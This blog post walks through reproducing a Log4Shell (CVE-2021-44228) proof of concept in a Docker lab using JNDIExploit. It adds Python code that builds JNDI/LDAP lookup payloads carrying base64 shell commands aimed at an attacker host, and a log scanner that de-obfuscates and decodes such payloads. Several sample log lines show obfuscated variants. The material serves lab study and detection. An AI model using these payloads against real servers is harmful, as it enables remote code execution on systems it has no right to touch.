This week I had the pleasure of learning more about the 'popular' Log4j vulnerability (Log4Shell, CVE-2021-44228). I decided to take a quick note on a few cases I found in the IPS logs. Here we go...
Today we'll start here:
As this is only a quick note, we'll focus on one case:
a PoC payload I found in one of the IPS log files, delivered in a GET request.
TL;DR - our scope for today is:
* step1: prepare a working (vulnerable) environment
* step2: prepare a base64-encoded command to run on the remote/vulnerable target host
* step3: prepare JNDIExploit
* step4: run the PoC to gain RCE
* step5: enjoy the weekend ;)
Let's start from the beginning - step1:
To prepare my mini lab environment I used one of the Docker images already available online; this one should be a good example:
I simply followed the steps presented in the README. After a while we should be somewhere here:
Next step? Prepare a base64-encoded command to run on the remote/vulnerable target host. In the example mentioned above we can continue with 'touch pwned.txt' in the /tmp directory...
...but as the "feihong-cs" resource mentioned there (read as: the JNDIExploit-1.2-SNAPSHOT.jar file) was no longer available, I decided to find it somewhere else online ;]
So after a while we should be here:
Preparing step3:
So... (the first IP address, 62,210,..., is the real attacker's IP - be careful).
...when (your) step2 is ready:
We can move straight on to step4: running the PoC to achieve RCE:
Time to verify our request on the remote Docker host:
Looks like we're done. Remember to use this only for legal pentest/red team purposes! ;)
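Since the whole thing started from a payload spotted in IPS logs, here is the same procedure from both sides in one place, as an added example (my own code, not part of the original post or of JNDIExploit): the step2/step3 part builds the base64 command and the ${jndi:...} lookup, and the detection part pulls such lookups back out of access-log lines, undoing URL encoding and the usual nested-lookup obfuscation (${lower:j}, ${::-j}) and decoding the command. The "/Basic/Command/Base64/<b64>" path layout is assumed to follow the JNDIExploit convention; the attacker host, port and every log line below are constructed for the example.

```python
# Added example, not the post's own code: the payload-building side of step 2
# (base64-encode a command and wrap the LDAP URL in a ${jndi:...} lookup) and the
# defensive side the IPS log review implies: pull JNDI lookups out of web-server
# log lines, undo the common nested-lookup obfuscation, and decode the command.
# Assumptions: the "/Basic/Command/Base64/<b64>" path layout follows the
# JNDIExploit convention; hosts, ports and the log lines below are constructed.
import base64
import binascii
import re
from typing import Optional
from urllib.parse import unquote


def b64_command(cmd: str) -> str:
    """Step 2: base64-encode the command the target should run."""
    return base64.b64encode(cmd.encode()).decode()


def build_jndi_payload(attacker: str, port: int, cmd: str) -> str:
    """Step 3/4: the lookup string the attacker places in any field Log4j logs."""
    return f"${{jndi:ldap://{attacker}:{port}/Basic/Command/Base64/{b64_command(cmd)}}}"


# Innermost obfuscation lookups: ${lower:j} / ${upper:j} -> j,
# ${::-j} and ${env:NOPE:-j} (empty or unset lookup with a default) -> j.
_INNER = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}|\$\{[^${}]*:-([^${}]*)\}")
_JNDI = re.compile(r"\$\{jndi:([a-z]+)://([^/\s}]+)(/[^\s}]*)?\}", re.IGNORECASE)
_B64_PATH = re.compile(r"/Basic/Command/Base64/([A-Za-z0-9+/=]+)", re.IGNORECASE)


def normalize_lookup(s: str) -> str:
    """Collapse nested lookups until nothing changes, so '${${lower:j}ndi:...}'
    becomes '${jndi:...}' and a plain keyword match sees it."""
    prev = None
    while prev != s:
        prev = s
        s = _INNER.sub(lambda m: m.group(1) if m.group(1) is not None else m.group(2), s)
    return s


def find_jndi(line: str) -> Optional[dict]:
    """Return scheme, host:port, path and decoded command for a log line that
    carries a JNDI lookup (after URL-decoding and de-obfuscation), else None."""
    m = _JNDI.search(normalize_lookup(unquote(line)))
    if not m:
        return None
    scheme, host, path = m.group(1).lower(), m.group(2), m.group(3) or ""
    cmd = None
    b = _B64_PATH.search(path)
    if b:
        try:
            cmd = base64.b64decode(b.group(1), validate=True).decode("utf-8", "replace")
        except binascii.Error:
            cmd = None  # malformed base64: still report the lookup, just no command
    return {"scheme": scheme, "host": host, "path": path, "command": cmd}


# Constructed sample access-log lines (not the IPS logs from the post).
SAMPLE_LOG = [
    # payload in the request path, the GET-request case the post looks at
    '203.0.113.7 - - [12/Dec/2021:10:01:02 +0000] "GET /${jndi:ldap://198.51.100.9:1389'
    '/Basic/Command/Base64/dG91Y2ggL3RtcC9wd25lZC50eHQ=} HTTP/1.1" 404 -',
    # nested-lookup obfuscation in the User-Agent
    '203.0.113.7 - - [12/Dec/2021:10:01:05 +0000] "GET / HTTP/1.1" 200 - "-" '
    '"${${::-j}${::-n}${::-d}${::-i}:${lower:ldap}://198.51.100.9:1389'
    '/Basic/Command/Base64/aWQgPiAvdG1wL2lk}"',
    # the same payload URL-encoded in a query string
    '203.0.113.7 - - [12/Dec/2021:10:01:09 +0000] "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F'
    '198.51.100.9%3A1389%2FBasic%2FCommand%2FBase64%2FaWQgPiAvdG1wL2lk%7D HTTP/1.1" 200 -',
    # benign request
    '203.0.113.8 - - [12/Dec/2021:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 1234',
]


def scan(lines) -> list:
    """Run find_jndi over a log and keep the hits, preserving line order."""
    return [hit for hit in (find_jndi(l) for l in lines) if hit]


if __name__ == "__main__":
    print(build_jndi_payload("198.51.100.9", 1389, "touch /tmp/pwned.txt"))
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

The de-obfuscation loop matters more than the regex: a naive grep for the literal `jndi` misses the second sample line entirely, while the URL-decode handles the third. The decoded command is what tells you whether a hit was a scanner's `touch`/`id` probe or something worth escalating.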
Enjoy your weekend ;)
P.S.
Yes, for obvious reasons the revshell PoC won't be published here... ;*
...and that's the reason for the difference in payload outputs in the screenshots ;)